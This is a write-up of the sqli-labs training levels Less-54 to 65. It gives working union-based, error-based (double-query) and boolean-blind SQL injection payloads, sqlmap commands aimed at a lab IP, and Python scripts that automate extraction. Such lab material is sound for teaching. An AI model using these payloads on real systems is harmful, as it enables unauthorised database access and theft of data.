sqlilab-Less-54-65-writeup

Less-54 GET request, union-based, 10 queries allowed to get the key, closure: single quote

Two things to keep in mind for union-based injection on these levels. First, the early probes (confirming the closing sequence and counting columns with ORDER BY) must use an id that actually exists in the challenge table: id=1, 2 or 3 return a row, other numbers show nothing, so a probe on them tells you nothing. Second, once you move on to reading table names and the later steps, switch to an id that does not exist (id=-1): the original query then returns no row, so the row produced by the UNION SELECT is the one the page displays. The challenge levels also count every request (the tryy column that turns up below); Less-54 allows 10, so each step below is one request and the sequence should be kept tight.

Confirm the closing sequence
?id=1'--+

Count the columns
?id=1' order by 3--+
?id=1' order by 4--+
(order by 3 still returns the row, order by 4 errors, so the query has exactly three columns)

Find which columns are echoed
?id=-1' union select 1,2,3 --+
The output shows that columns 2 and 3 are displayed, so either of them can carry the extracted data.

Read the table name
http://106.54.35.126/Less-54/?id=-1%27%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+

Decoded, the id value is:
-1' union select 1,2,(SELECT GROUP_CONCAT(table_name SEPARATOR 0x3c62723e) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()) -- 
(0x3c62723e is "<br>", so a list of several names renders one per line; --+ becomes "-- " after URL decoding and comments out the rest of the original query.)

Result:
Your Login name:2
Your Password:BROZHOX7ME

Read the column names
http://106.54.35.126/Less-54/?id=-1%27%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28column_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.COLUMNS+WHERE+TABLE_NAME=0x42524f5a484f58374d45%29--+

The table name is passed as a hex literal, BROZHOX7ME ---> 0x42524f5a484f58374d45, so the payload needs no quote characters of its own inside the already-quoted context (online converter: https://www.bejson.com/convert/ox2str/).

Result:
Your Login name:2
Your Password:id
sessid
secret_FDK5
tryy

The key lives in the column named secret_XXXX (here secret_FDK5); sessid and tryy are the challenge's own session and attempt-counter columns. Both the table name and the secret column name are random and change whenever the challenge is reset, so take them from the output rather than reusing the values printed here.

Read the key
http://106.54.35.126/Less-54/?id=-1%27%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28secret_FDK5%29+FROM+BROZHOX7ME%29--+

Result:
Your Login name:2
Your Password:oNf3esAKnoNVUbViCYCbGPzv

Less-55 GET request, union-based, 14 queries allowed to get the key, closure: parenthesis

Same payloads as Less-54; only the closing sequence changes, from a single quote to a closing parenthesis (the id is used as a number inside parentheses here, so there is no quote to close).

Confirm the closing sequence
?id=1)--+

http://106.54.35.126/Less-55/?id=-1)%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+

The remaining steps are the same as in Less-54.


Less-56 GET request, union-based, 14 queries allowed to get the key, closure: single quote and parenthesis

Confirm the closing sequence
?id=1')--+

http://106.54.35.126/Less-56/?id=-1%27%29%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+

The remaining steps are the same as in Less-54.


Less-57 GET request, union-based, 14 queries allowed to get the key, closure: double quote

Confirm the closing sequence
?id=1"--+

http://106.54.35.126/Less-57/?id=-1%22%20union%20select%201,2,%28SELECT+GROUP_CONCAT%28table_name+SEPARATOR+0x3c62723e%29+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE%28%29%29%20--+

The remaining steps are the same as in Less-54.
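The seven requests of Less-54 to Less-57 as one script, an added Python example that is not the writeup's own code: it builds the chain for any of the four closing sequences, URL-encodes the id value the way the links above are encoded, hex-encodes the table name for the column lookup, and parses the <br>-separated names out of the page output. The page responses it parses are constructed samples modelled on the Less-54 output shown above; the names walk, to_url, build_chain and parse_password_field are this example's own.

```python
"""Union-based extraction chain for sqli-labs Less-54 to Less-57.

Added example, not code from the original writeup. It reproduces the request
sequence the writeup sends by hand, parameterised by the closing sequence so one
chain covers Less-54 ('), Less-55 ()), Less-56 (')) and Less-57 ("). The page
responses below are constructed samples shaped like the writeup's results; nothing
is sent over the network.
"""
import re
from typing import Dict, List, Optional
from urllib.parse import quote_plus

# Closing sequence per level, as worked out in the writeup.
CLOSURES: Dict[str, str] = {"Less-54": "'", "Less-55": ")", "Less-56": "')", "Less-57": '"'}

BR = "0x3c62723e"   # "<br>" as a hex literal: GROUP_CONCAT separator, so names render one per line
COMMENT = "-- "     # MySQL needs the trailing space; quote_plus encodes it as '+', giving the familiar --+


def hexlit(s: str) -> str:
    """MySQL hex literal for s, so the payload needs no quote characters of its own."""
    return "0x" + s.encode().hex()


def build_chain(closure: str, table: Optional[str] = None, secret_col: Optional[str] = None) -> List[str]:
    """Raw id values in sending order. Steps 6 and 7 need names learned from the earlier responses."""
    chain = [
        f"1{closure}{COMMENT}",                       # 1. closure probe: the normal row comes back
        f"1{closure} order by 3{COMMENT}",            # 2. row still returned: at least 3 columns
        f"1{closure} order by 4{COMMENT}",            # 3. error: so exactly 3 columns
        f"-1{closure} union select 1,2,3{COMMENT}",   # 4. id=-1 matches nothing, so the UNION row is shown
        f"-1{closure} union select 1,2,(SELECT GROUP_CONCAT(table_name SEPARATOR {BR}) "
        f"FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()){COMMENT}",           # 5. table name
    ]
    if table:
        chain.append(
            f"-1{closure} union select 1,2,(SELECT GROUP_CONCAT(column_name SEPARATOR {BR}) "
            f"FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME={hexlit(table)}){COMMENT}")  # 6. column names
    if table and secret_col:
        chain.append(
            f"-1{closure} union select 1,2,(SELECT GROUP_CONCAT({secret_col}) FROM {table}){COMMENT}")  # 7. the key
    return chain


def to_url(base: str, payload: str) -> str:
    """URL-encode an id value the way the writeup's links are encoded."""
    return f"{base}?id={quote_plus(payload)}"


def parse_password_field(html: str) -> List[str]:
    """Values the page echoes after 'Your Password:', split on the <br> separator used in GROUP_CONCAT."""
    m = re.search(r"Your Password:(.*?)(?:</font>|$)", html, re.S)
    if not m:
        return []
    return [v.strip() for v in re.split(r"<br\s*/?>", m.group(1)) if v.strip()]


def pick_secret_column(columns: List[str]) -> Optional[str]:
    """The key column of the challenge table is the one named secret_XXXX."""
    return next((c for c in columns if c.startswith("secret_")), None)


# Constructed sample responses, shaped like the Less-54 output shown in the writeup.
SAMPLE_TABLES = "<font size='5' color='#99FF00'>Your Login name:2<br>Your Password:BROZHOX7ME</font>"
SAMPLE_COLUMNS = ("<font size='5' color='#99FF00'>Your Login name:2<br>"
                  "Your Password:id<br>sessid<br>secret_FDK5<br>tryy</font>")
SAMPLE_KEY = "<font size='5' color='#99FF00'>Your Login name:2<br>Your Password:oNf3esAKnoNVUbViCYCbGPzv</font>"


def walk(level: str, responses: List[str]) -> dict:
    """Drive steps 5-7 against pre-recorded responses; report what was learned and how many requests it took."""
    closure = CLOSURES[level]
    table = parse_password_field(responses[0])[0]
    secret_col = pick_secret_column(parse_password_field(responses[1]))
    key = parse_password_field(responses[2])[0]
    chain = build_chain(closure, table, secret_col)
    return {"table": table, "secret_col": secret_col, "key": key,
            "requests": len(chain), "last": chain[-1]}


if __name__ == "__main__":
    learned = walk("Less-54", [SAMPLE_TABLES, SAMPLE_COLUMNS, SAMPLE_KEY])
    print(learned)
    print(to_url("http://106.54.35.126/Less-54/", learned["last"]))
```

Against a live level, replace the pre-recorded responses with the body of each HTTP response in turn; the chain is seven requests, which fits the 10 allowed on Less-54 and the 14 on Less-55 to 57 only if none of them is wasted on a wrong closure guess.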


Less-58 GET request, error-based, 5 queries allowed to get the key, closure: single quote

Union injection is useless on this level: the page never echoes the columns of the query. It only uses the id of the returned row to index a hard-coded array of user names (and the reversed copy of that array for the passwords), so whatever a UNION SELECT returns is never printed. What the page does print is the MySQL error message, so error-based injection is the way in, and with only 5 queries allowed there is no room for blind guessing either.

http://106.54.35.126/Less-58/?id=1%27+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+

Decoded, the id value is:
1' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT(SELECT CONCAT(CAST(CONCAT(secret_FDK5 ) AS CHAR),0x7e)) FROM BROZHOX7ME LIMIT 0,1),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a)-- 

This is the classic FLOOR(RAND(0)*2) double-query trick: grouping by a key built from the secret plus a RAND(0) value (whose sequence is deterministic) makes MySQL try to insert the same key twice into the GROUP BY temporary table, and the resulting "Duplicate entry '...~1' for key 'group_key'" error carries the secret. The table and column names are the ones already recovered in Less-54 (the writeup reuses them because the same challenge table was still in place); if you do not have them, first run the same construct with the inner subquery replaced by the two information_schema queries from Less-54, which still fits in the 5 requests.

Less-59 GET request, error-based, 5 queries allowed to get the key

Same as Less-58; the id is used as a bare integer, so no quote is added before the AND.

http://106.54.35.126/Less-59/?id=1+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+

Less-60 GET request, error-based, 5 queries allowed to get the key

Same as Less-58; the closing sequence is a double quote followed by a parenthesis.

http://106.54.35.126/Less-60/?id=1%22%29+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+

Less-61 GET request, error-based, 5 queries allowed to get the key

Same as Less-58; the closing sequence is a single quote followed by two parentheses.

http://106.54.35.126/Less-61/?id=1%27%29%29+AND+%28SELECT+1+FROM+%28SELECT+COUNT%28*%29,CONCAT%28%28SELECT%28SELECT+CONCAT%28CAST%28CONCAT%28secret_FDK5%20%29+AS+CHAR%29,0x7e%29%29+FROM+BROZHOX7ME+LIMIT+0,1%29,FLOOR%28RAND%280%29*2%29%29x+FROM+INFORMATION_SCHEMA.TABLES+GROUP+BY+x%29a%29--+
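The same double-query construct for all four closures of Less-58 to Less-61, as an added Python example that is not the writeup's code: it builds the payload with the inner subquery swapped for the table-name, column-name or key query (a simplified form of the one above, with the 0x7e appended outside the subquery), counts the requests against the budget of five, and parses the leaked value out of the Duplicate entry error. The error strings are constructed samples; next_request, requests_needed, window and WINDOW are this example's own names, and the 60-character slice width is an assumption chosen to stay under the length MySQL keeps of the value in the message.

```python
"""Error-based (double query) extraction for sqli-labs Less-58 to Less-61.

Added example, not code from the original writeup. It builds the FLOOR(RAND(0)*2)
payload for each level's closing sequence, counts requests against the budget of
five, and parses the leaked value out of the MySQL 'Duplicate entry' message the
page echoes. The error strings at the bottom are constructed samples in the format
MySQL produces for this trick.
"""
import re
from typing import Optional

# Closing sequence per level, as given in the writeup (Less-59 injects into a bare integer).
CLOSURES = {"Less-58": "'", "Less-59": "", "Less-60": '")', "Less-61": "'))"}
COMMENT = "-- "
BUDGET = 5    # requests allowed on these levels before the challenge resets
WINDOW = 60   # assumed safe slice width: MySQL truncates the value it echoes in the error message


def hexlit(s: str) -> str:
    """MySQL hex literal, so a table name can be used without quote characters."""
    return "0x" + s.encode().hex()


def double_query(closure: str, inner: str) -> str:
    """Wrap a scalar subquery in the duplicate-key trick.

    GROUP BY on CONCAT(value, '~', FLOOR(RAND(0)*2)) makes MySQL compute the same group key
    twice while filling the GROUP BY temporary table (RAND(0) is deterministic: 0,1,1,0,1,1,...),
    so the query fails with "Duplicate entry '<value>~1' for key 'group_key'" and the value
    rides out in the error text.
    """
    return (f"1{closure} AND (SELECT 1 FROM (SELECT COUNT(*),"
            f"CONCAT(({inner}),0x7e,FLOOR(RAND(0)*2))x "
            f"FROM INFORMATION_SCHEMA.TABLES GROUP BY x)a){COMMENT}")


def window(inner: str, start: int, width: int = WINDOW) -> str:
    """Slice a long result (e.g. a GROUP_CONCAT of many columns) so it survives the message truncation."""
    return f"SUBSTRING(({inner}),{start},{width})"


def inner_tables() -> str:
    return "SELECT GROUP_CONCAT(table_name) FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA=DATABASE()"


def inner_columns(table: str) -> str:
    return f"SELECT GROUP_CONCAT(column_name) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME={hexlit(table)}"


def inner_key(table: str, col: str) -> str:
    return f"SELECT {col} FROM {table} LIMIT 0,1"


def next_request(level: str, table: Optional[str] = None, col: Optional[str] = None) -> str:
    """The next id value to send, given what is already known: table name, then column name, then the key."""
    closure = CLOSURES[level]
    if table is None:
        return double_query(closure, inner_tables())
    if col is None:
        return double_query(closure, inner_columns(table))
    return double_query(closure, inner_key(table, col))


def requests_needed(table_known: bool, col_known: bool) -> int:
    """Closure probe, the discovery steps still missing, and the key itself; must stay within BUDGET."""
    return 1 + (0 if table_known else 1) + (0 if col_known else 1) + 1


DUP_RE = re.compile(r"Duplicate entry '(.*)~[01]' for key '<?group_key>?'")


def parse_leak(error_text: str) -> Optional[str]:
    """Value carried by the duplicate-entry error, or None if the page showed a different error (or none)."""
    m = DUP_RE.search(error_text)
    return m.group(1) if m else None


# Constructed sample errors, in the MySQL 8.x and 5.x spellings of the key name.
SAMPLE_ERR_TABLE = "Duplicate entry 'BROZHOX7ME~1' for key '<group_key>'"
SAMPLE_ERR_KEY = "Duplicate entry 'oNf3esAKnoNVUbViCYCbGPzv~1' for key 'group_key'"

if __name__ == "__main__":
    print(next_request("Less-58", "BROZHOX7ME", "secret_FDK5"))
    print(parse_leak(SAMPLE_ERR_KEY), "in", requests_needed(True, True), "requests (budget", BUDGET, ")")
```

Starting from nothing the sequence is four requests (probe, table, columns, key), one short of the budget, so the closure probe must be right first time; when a GROUP_CONCAT result is long, wrap the inner query with window() and page through it, at the cost of one request per slice.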

Less-62 GET request, blind, 130 queries allowed to get the key

Same query as Less-58, but the page no longer prints the MySQL error, so the only signals left are boolean (does the normal row come back or not) and time delay. The closing sequence is a single quote followed by a parenthesis, so the closure probe is ?id=1')--+.

Use sqlmap, boolean-based blind first (--technique=B); if that finds nothing, fall back to time-based (--technique=T):

python sqlmap.py -u http://106.54.35.126/Less-62/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch

python sqlmap.py -u http://106.54.35.126/Less-62/?id=1 --dbms=MySQL --random-agent --flush-session --technique=T -v 3 --level=3 --risk=3 --dbs --batch

--dbs only lists the databases. Reaching the key still takes enumerating the table (--tables), its columns (--columns) and dumping the secret column (--dump), and every request sqlmap sends counts against the 130 allowed, so skip the enumeration steps whose answers you already have from the earlier levels and pass the names directly with -D, -T and -C.

Less-63 GET request, blind, 130 queries allowed to get the key

Same as Less-62; the closing sequence is a single quote (probe: ?id=1'--+).

Boolean-based blind with sqlmap:

python sqlmap.py -u http://106.54.35.126/Less-63/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch

Less-64 GET request, blind, 130 queries allowed to get the key

Same as Less-62; the id is a number inside two parentheses (probe: ?id=1))--+).

Boolean-based blind with sqlmap:

python sqlmap.py -u http://106.54.35.126/Less-64/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch

Less-65 GET request, blind, 130 queries allowed to get the key

Same as Less-62; the closing sequence is a double quote followed by a parenthesis (probe: ?id=1")--+).

Boolean-based blind with sqlmap:

python sqlmap.py -u http://106.54.35.126/Less-65/?id=1 --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --level=3 --risk=3 --dbs --batch
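What a boolean-blind tool actually has to do on Less-62 to Less-65, as an added Python example that is neither the writeup's code nor sqlmap's: it injects length and per-character comparisons with the level's closing sequence, binary-searches each character, and counts the requests against the budget of 130. FakePage is a constructed stand-in for the target that answers the injected condition from a known key, so the script runs offline; the names Extractor, FakePage, run and worst_case_requests are this example's own. With the 24-character key recovered in Less-54 it lands between 150 and 175 requests, above the budget, which is why the request count has to be planned before the first one is sent and why every enumeration step sqlmap can be spared matters.

```python
"""Boolean-based blind extraction with request accounting, for sqli-labs Less-62 to Less-65.

Added example, not code from the original writeup and not sqlmap's internals. It builds the
TRUE/FALSE conditions a boolean-blind tool injects, drives them with a binary search, counts
the requests and compares the total with the level's budget. FakePage is a constructed
stand-in for the vulnerable page (it evaluates the injected condition against a known key),
so the script runs offline; to use the extractor for real, replace it with a function that
sends the payload over HTTP and returns whether the normal row came back.
"""
import math
import re
from typing import Callable, Tuple

# Closing sequence per level, as given in the writeup.
CLOSURES = {"Less-62": "')", "Less-63": "'", "Less-64": "))", "Less-65": '")'}
COMMENT = "-- "
BUDGET = 130  # requests allowed on the blind levels before the challenge resets


def cond_length(closure: str, table: str, col: str, n: int) -> str:
    """The row is returned only if the key is longer than n characters."""
    return f"1{closure} AND LENGTH((SELECT {col} FROM {table} LIMIT 0,1))>{n}{COMMENT}"


def cond_char(closure: str, table: str, col: str, pos: int, n: int) -> str:
    """The row is returned only if the character at 1-based position pos of the key is above code n."""
    return f"1{closure} AND ASCII(SUBSTRING((SELECT {col} FROM {table} LIMIT 0,1),{pos},1))>{n}{COMMENT}"


def worst_case_requests(key_len: int, alphabet: int = 95, max_len: int = 64) -> int:
    """Requests a binary search needs at most: one search for the length, then one per character."""
    return math.ceil(math.log2(max_len + 1)) + key_len * math.ceil(math.log2(alphabet))


class Extractor:
    """send(payload) returns True when the page shows the normal row, False otherwise."""

    def __init__(self, send: Callable[[str], bool], closure: str, table: str, col: str):
        self.send, self.closure, self.table, self.col = send, closure, table, col
        self.requests = 0

    def _ask(self, payload: str) -> bool:
        self.requests += 1
        return self.send(payload)

    def _search(self, build: Callable[[int], str], lo: int, hi: int) -> int:
        """Find v in [lo, hi] where build(n) is True for n < v and False for n >= v."""
        while lo < hi:
            mid = (lo + hi) // 2
            if self._ask(build(mid)):   # v > mid
                lo = mid + 1
            else:
                hi = mid
        return lo

    def length(self, max_len: int = 64) -> int:
        return self._search(lambda n: cond_length(self.closure, self.table, self.col, n), 0, max_len)

    def extract(self, lo_char: int = 32, hi_char: int = 126) -> str:
        """Pull the whole key, one binary search per character over the printable ASCII range."""
        n = self.length()
        return "".join(
            chr(self._search(lambda t, p=p: cond_char(self.closure, self.table, self.col, p, t), lo_char, hi_char))
            for p in range(1, n + 1))


class FakePage:
    """Constructed stand-in for the target: a fixed key and the level's closing sequence."""

    LEN_RE = re.compile(r"LENGTH\(\(SELECT \w+ FROM \w+ LIMIT 0,1\)\)>(\d+)")
    CHAR_RE = re.compile(r"SUBSTRING\(\(SELECT \w+ FROM \w+ LIMIT 0,1\),(\d+),1\)\)>(\d+)")

    def __init__(self, closure: str, key: str):
        self.closure, self.key = closure, key

    def __call__(self, payload: str) -> bool:
        if not payload.startswith(f"1{self.closure} AND "):
            return False  # wrong closure is a syntax error: no row, indistinguishable from FALSE
        m = self.LEN_RE.search(payload)
        if m:
            return len(self.key) > int(m.group(1))
        m = self.CHAR_RE.search(payload)
        pos, n = int(m.group(1)), int(m.group(2))
        return pos <= len(self.key) and ord(self.key[pos - 1]) > n


def run(level: str, key: str, table: str = "BROZHOX7ME", col: str = "secret_FDK5") -> Tuple[str, int]:
    """Extract `key` from a FakePage for `level`; returns (recovered key, requests used)."""
    closure = CLOSURES[level]
    ex = Extractor(FakePage(closure, key), closure, table, col)
    return ex.extract(), ex.requests


if __name__ == "__main__":
    recovered, used = run("Less-62", "oNf3esAKnoNVUbViCYCbGPzv")   # 24-char key like the one from Less-54
    print(recovered, used, "requests, budget", BUDGET, "-> fits" if used <= BUDGET else "-> exceeds budget")
    print("worst case for 24 chars:", worst_case_requests(24), "alnum only:", worst_case_requests(24, 62))
```

Two things the simulation makes visible: a wrong closure never errors visibly on a blind level, it just answers FALSE to everything (the length search then returns 0 and nothing is extracted), and even narrowing the alphabet to the 62 alphanumerics only brings a 24-character key down to about 150 requests, still over 130.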

A confused life takes constant effort before the hazy ambitions in the distance come into view!
Original post: https://www.cnblogs.com/autopwn/p/13730992.html